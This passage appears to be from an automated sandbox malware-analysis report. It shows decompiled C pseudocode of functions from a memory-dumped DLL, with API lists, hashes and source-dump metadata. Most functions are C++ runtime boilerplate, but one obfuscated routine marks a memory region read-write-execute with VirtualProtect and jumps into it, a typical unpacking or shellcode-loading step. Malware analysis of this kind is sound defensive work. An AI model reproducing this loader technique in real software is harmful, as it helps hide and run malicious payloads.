																															 *0x6e286dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6E1C6FD3(__eflags, _t683);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6e286dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6E1C6FD3(__eflags, _t682);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6e286dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6E1C6FD3(__eflags, _t681);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6e286df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6E1C6FD3(__eflags, _t680);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6e286df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6E1C6FD3(__eflags, _t679);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6e286dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6E1C6FD3(__eflags, _t678);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6e286df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6E1C6FD3(__eflags, _t677);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6e286dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6E1C6FD3(__eflags, _t676);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6e286dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF2E0
int.LIBCPMT ref: 6E1CF2F7

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF331
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF351
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF36F

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9fb3b63657be8cb50626755b810ac0c1ad2ef9128b811007553a591ef1869815
Instruction ID: 5b55dc90c2d450d8151c4fa4988c1c7b7c7d6c6ee190d8d095b3d50f87f5c9df
Opcode Fuzzy Hash: 9fb3b63657be8cb50626755b810ac0c1ad2ef9128b811007553a591ef1869815
Instruction Fuzzy Hash: 0A113A759105189BCF01DBD4C854AFEB77AAF64B04F244809D430EB2D0DF789985E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA1A5, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1CA1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t136 =  *0x6e286ccc;
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6E1A161C(0x6e286cb8);
				_t102 = _a8;
				_t50 = E6E1A171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t132, _t136, 0x14);
							E6E1C6653( &_v20, 0);
							_t137 =  *0x6e286cd0;
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6E1A161C(0x6e286cbc);
							_t109 = _a8;
							_t133 = E6E1A171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t99, _t133, _t137, 0x14);
										E6E1C6653( &_v20, 0);
										_t138 =  *0x6e286cd4;
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6E1A161C(0x6e286cc0);
										_t116 = _a8;
										_t134 = E6E1A171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6E1A1438(_t120);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6e22ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t134);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6e286cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t133);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6e286cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t132);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6e286ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA1B6
int.LIBCPMT ref: 6E1CA1CD

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CA207
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA227
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA245

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 24a465c5665b279d3e83fbffa350a33a2c2c4201ff3f9eedec76ac56dd008262
Instruction ID: 038259684511887e7304fa9311fe947217eccf771f2b54d6811a924041824975
Opcode Fuzzy Hash: 24a465c5665b279d3e83fbffa350a33a2c2c4201ff3f9eedec76ac56dd008262
Instruction Fuzzy Hash: A4115C7591052DCBCF01DBD4C844AFDB37AAF64B14F140909D511E7290CF78D985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C46AB, Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C46AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6E1E00AC(0x6e228144, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6e29ce84;
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6E1A161C(0x6e29cea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6E1A171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6E1C66BA(_t88 - 0x14);
					return E6E1E0075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6E1C4FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t88 - 0x20);
							E6E1E3D74(_t88 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22816f, __ebx, _t83, _t86, 0x18);
							E6E1C6653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6e29ce7c;
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6E1A161C(0x6e29ce90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6E1A171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6E1C66BA(_t88 - 0x14);
								return E6E1E0075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6E1C4F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6E1A1438(_t76);
										E6E1E3D74(_t88 - 0x20, 0x6e283504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6E1C6FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6e29ce7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6E1C6FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6e29ce84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1C46B2
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C46BC
int.LIBCPMT ref: 6E1C46D3

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4723
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C4741

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a61c6006986c2db49b977b7f79f49d6991cdada0fdee7bf4fa6347e242ee489f
Instruction ID: b1bbb36f3ce974606266bdfa6be00035076989d3f2f0ef3a311a289d9304dfd9
Opcode Fuzzy Hash: a61c6006986c2db49b977b7f79f49d6991cdada0fdee7bf4fa6347e242ee489f
Instruction Fuzzy Hash: 1C11487590462DCBCB01DBE4C814AFDB779BF24B14F100908E120EB290DB789985E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D5FF, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E20D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e2851e4;
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E20C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E214196(_t25, __eflags,  *0x6e2851e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20D33F(_t25, _t31, 0x6e2876f0);
							E6E20CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E20CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E2062FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e2851e4;
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E20C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E214196(_t27, __eflags,  *0x6e2851e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E20D33F(_t27, _t32, 0x6e2876f0);
									E6E20CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E20CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E214140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E214140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D603
_free.LIBCMT ref: 6E20D636
_free.LIBCMT ref: 6E20D65E
SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D66B
SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D677
_abort.LIBCMT ref: 6E20D67D

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: da5f2a04dc9e0042874b9342331442a7623d709f74e4093e2df1a8aa01f3d4dc
Instruction ID: 19f27a94440cbec6089753ab493450d8930eefda881e20ecf7b1a33f68bcafe4
Opcode Fuzzy Hash: da5f2a04dc9e0042874b9342331442a7623d709f74e4093e2df1a8aa01f3d4dc
Instruction Fuzzy Hash: A1F0F4BA545A0E2BC74216F4AD49F8B236F8BC367AB280915F52CD61D4EF6084028874

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C75E8, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E1C75E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6E1C73A9( &_v16, _a4);
				E6E1E3D74( &_v16, 0x6e2814fc);
				asm("int3");
				_push(_t35);
				E6E1C73E3( &_v44, _v24);
				E6E1E3D74( &_v44, 0x6e281538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6E1C7426( &_v76, _v52);
				E6E1E3D74( &_v76, 0x6e2815ac);
				asm("int3");
				_push(_t33);
				E6E1A1420( &_v68, _v48);
				E6E1E3D74( &_v68, 0x6e283450);
				asm("int3");
				return "bad function call";
			}

0x6e1c75eb
0x6e1c75f4
0x6e1c7602
0x6e1c7607
0x6e1c7608
0x6e1c7614
0x6e1c7622
0x6e1c7627
0x6e1c7628
0x6e1c7629
0x6e1c7634
0x6e1c7642
0x6e1c7647
0x6e1c7648
0x6e1c7654
0x6e1c7662
0x6e1c7667
0x6e1c766d

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E1C75F4

Part of subcall function 6E1C73A9: std::exception::exception.LIBCONCRT ref: 6E1C73B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7602

Part of subcall function 6E1E3D74: RaiseException.KERNEL32(?,?,6E1C75E7,00000000,?,?,?,?,?,?,?,6E1C75E7,00000000,6E2814C0,?), ref: 6E1E3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E1C7614

Part of subcall function 6E1C73E3: std::exception::exception.LIBCONCRT ref: 6E1C73F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7622
std::regex_error::regex_error.LIBCPMT ref: 6E1C7634

Part of subcall function 6E1C7426: std::exception::exception.LIBCONCRT ref: 6E1C743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7642

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: 8259015cbef123a37b24c563d5b27f521c912703c1c9c1617d5fd2e4d5e105ea
Instruction ID: 53c6ac099acc4f3c244312de25c5feb8dce0d371fcf3ff68a1c06f66eeb258c1
Opcode Fuzzy Hash: 8259015cbef123a37b24c563d5b27f521c912703c1c9c1617d5fd2e4d5e105ea
Instruction Fuzzy Hash: ABF01235C0050C7BCB06FAF4DC49CDEBB7DAA14504F804D21BA20965D1EB75A79E97D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BF218, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 188
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E1BF218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t34;
				void* _t44;
				signed int _t51;
				signed short _t59;
				signed int _t72;
				signed char _t81;
				signed char _t84;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				signed int _t108;
				void* _t109;
				signed char _t110;
				signed int _t116;
				signed int _t122;
				signed int _t128;
				signed int _t129;
				signed char _t133;
				signed int _t134;
				signed char _t135;
				signed int _t137;
				void* _t138;
				signed short* _t139;
				signed short* _t142;
				signed short _t144;

				_t34 =  *0x6e2859e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t102 = __edx;
				_v20 = 0xf;
				_t128 =  *0x6e2859d8;
				_t142 = 0x6e2859e6;
				_t137 =  *0x6e285a00;
				_v24 = _t34;
				_v16 = __edx;
				do {
					if(_t128 != _t34 ||  *0x6e2859dc != _t102) {
						_t137 = _t137 * ( *_t142 & 0x0000ffff);
						_t104 = _t128 + 5 + _t137;
						 *0x6e285a90 = _t104;
						if(_t104 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t34 = _v24;
							_t102 = _v16;
							goto L5;
						}
					} else {
						goto L5;
					}
					break;
					L5:
					_t142 =  &(_t142[1]);
				} while (_t142 < 0x6e285a44);
				_t143 = _v12 * 0x10e1d;
				 *0x6e285a00 = _t137;
				_t138 =  *0x6e29c8d0;
				 *0x6e285a04 = _t128 -  *0x6e285a04 + 0x11;
				 *0x6e288698 = _t138;
				 *0x6e2859d8 = E6E1E01E0(_v12 * 0x10e1d, 0, _t128,  *0x6e2859dc);
				 *0x6e2859dc = _t128;
				VirtualProtect(_t138, 0x305a, 0x40, 0x6e28869c);
				_t129 =  *0x6e2859d0;
				_t44 = 6;
				_v24 = _t129;
				if( *0x6e285a02 == _t44) {
					 *0x6e285a00 =  *0x6e285a90 + 0x11dde + _t129;
				} else {
					 *0x6e285a90 =  *0x6e285a90 +  ~_t129 -  *0x6e285a00 * 0x3d;
				}
				_t105 =  *0x6e2859d8;
				_t130 =  *0x6e2859e6 & 0x0000ffff;
				_v5 = _t129 +  *0x6e2859d8;
				if(( *0x6e2859f2 & 0x0000ffff) + ( *0x6e2859e6 & 0x0000ffff) != 0x32) {
					_t51 = E6E1E01E0(_t143, 0, _t105,  *0x6e2859dc);
					_v16 = _t51;
					_v20 = _t51 * 0x00000037 & 0x0000ffff;
				} else {
					_t98 = E6E1E01E0(E6E1E01E0(_t105,  *0x6e2859dc, _t105,  *0x6e2859dc), _t130, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t98 + _v12 + 0xf;
				}
				_t139 = 0x6e2859e6;
				_t108 = _v16;
				_t133 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t133;
				 *0x6e285a04 = _t133;
				if( *0x6e285a04 != 0x1b47) {
					_t59 = _v20;
				} else {
					asm("cdq");
					_t133 = _v24;
					_t122 = _t108 + ( *0x6e2859e6 & 0x0000ffff);
					_v16 = _t122;
					_t59 = _v20 + _t122 * 2 + 0x3b;
				}
				_t109 = 6;
				if( *0x6e285a02 == _t109) {
					 *0x6e285a00 = (_t59 & 0x0000ffff) + 0x11dde + (_t133 & 0x000000ff);
				}
				_t110 =  *0x6e2859d0;
				 *0x6e2859dc =  *0x6e2859dc & 0x00000000;
				_t144 = _v16 + 0x00000005 + _t110 & 0x0000ffff;
				 *0x6e2859d8 = _t144 - _v12 - 0x54;
				 *0x6e2859d0 = _t110 + 0x23bbc + (_t133 & 0x000000ff) * 2;
				 *0x6e288698();
				_t134 = _v12;
				 *0x6e2859d8 =  *0x6e2859d8 +  *0x6e2859d0 + 0x3b + ( *0x6e285a04 & 0x000000ff);
				_t72 =  *0x6e2859e6 & 0x0000ffff;
				asm("adc dword [0x6e2859dc], 0x0");
				do {
					if(_t134 == _t72) {
						goto L22;
					} else {
						_t144 = ( *_t139 & 0x0000ffff) * (_t144 & 0x0000ffff) & 0x0000ffff;
						_t116 = _t134 + 5 + _t144;
						 *0x6e2859dc = 0;
						asm("cdq");
						 *0x6e2859d8 = _t116;
						if(_t116 != ( *0x6e2859f0 & 0x0000ffff)) {
							L21:
							_t72 =  *0x6e2859e6 & 0x0000ffff;
							_t134 = _v12;
							goto L22;
						} else {
							_t72 = 0;
							if(0 != _t134) {
								goto L21;
							}
						}
					}
					break;
					L22:
					_t139 =  &(_t139[1]);
				} while (_t139 < 0x6e285a44);
				asm("invalid");
				_t135 =  *0x6e2859d0;
				_push(0);
				asm("adc [0x6e2859dc], eax");
				 *0x6e2859d8 = 0x49 + (_t144 - 0x1165 - _v12 & 0x0000ffff) + 0x3b + _t135;
				_t81 = ((_t135 & 0x000000ff) * ( *0x6e285a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6e285a04 = _t81;
				_t84 = (_t81 & 0x000000ff) * 0x36 + _t135;
				 *0x6e2859d0 = _t84;
				return _t84;
			}

0x6e1bf21e
0x6e1bf225
0x6e1bf228
0x6e1bf22a
0x6e1bf22c
0x6e1bf233
0x6e1bf239
0x6e1bf23f
0x6e1bf245
0x6e1bf248
0x6e1bf24b
0x6e1bf24d
0x6e1bf25d
0x6e1bf268
0x6e1bf26a
0x6e1bf272
0x6e1bf274
0x6e1bf277
0x00000000
0x6e1bf277
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1bf27a
0x6e1bf27a
0x6e1bf27d
0x6e1bf28b
0x6e1bf29c
0x6e1bf2a2
0x6e1bf2a8
0x6e1bf2b2
0x6e1bf2ca
0x6e1bf2cf
0x6e1bf2d5
0x6e1bf2db
0x6e1bf2e3
0x6e1bf2e4
0x6e1bf2ee
0x6e1bf311
0x6e1bf2f0
0x6e1bf2fd
0x6e1bf2fd
0x6e1bf316
0x6e1bf31f
0x6e1bf326
0x6e1bf335
0x6e1bf36b
0x6e1bf370
0x6e1bf379
0x6e1bf337
0x6e1bf34e
0x6e1bf356
0x6e1bf35c
0x6e1bf35c
0x6e1bf385
0x6e1bf395
0x6e1bf3a0
0x6e1bf3a2
0x6e1bf3a5
0x6e1bf3b2
0x6e1bf3cf
0x6e1bf3b4
0x6e1bf3bb
0x6e1bf3bc
0x6e1bf3bf
0x6e1bf3c4
0x6e1bf3ca
0x6e1bf3ca
0x6e1bf3d4
0x6e1bf3dc
0x6e1bf3eb
0x6e1bf3eb
0x6e1bf3f3
0x6e1bf3fc
0x6e1bf405
0x6e1bf416
0x6e1bf421
0x6e1bf426
0x6e1bf43b
0x6e1bf440
0x6e1bf446
0x6e1bf44d
0x6e1bf454
0x6e1bf456
0x00000000
0x6e1bf458
0x6e1bf461
0x6e1bf469
0x6e1bf46d
0x6e1bf47a
0x6e1bf47b
0x6e1bf483
0x6e1bf48b
0x6e1bf48b
0x6e1bf492
0x00000000
0x6e1bf485
0x6e1bf485
0x6e1bf489
0x00000000
0x00000000
0x6e1bf489
0x6e1bf483
0x00000000
0x6e1bf495
0x6e1bf495
0x6e1bf498
0x6e1bf4a2
0x6e1bf4aa
0x6e1bf4b3
0x6e1bf4c5
0x6e1bf4d2
0x6e1bf4e3
0x6e1bf4e6
0x6e1bf4f1
0x6e1bf4f3
0x6e1bf4f9

APIs

VirtualProtect.KERNEL32(?,0000305A,00000040,6E28869C,?,00000000,?,?,?), ref: 6E1BF2D5

Strings

DZ(n, xrefs: 6E1BF498
Y(n, xrefs: 6E1BF239
Y(n, xrefs: 6E1BF385
DZ(n, xrefs: 6E1BF27D

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZ(n$DZ(n$Y(n$Y(n
API String ID: 544645111-2308019807
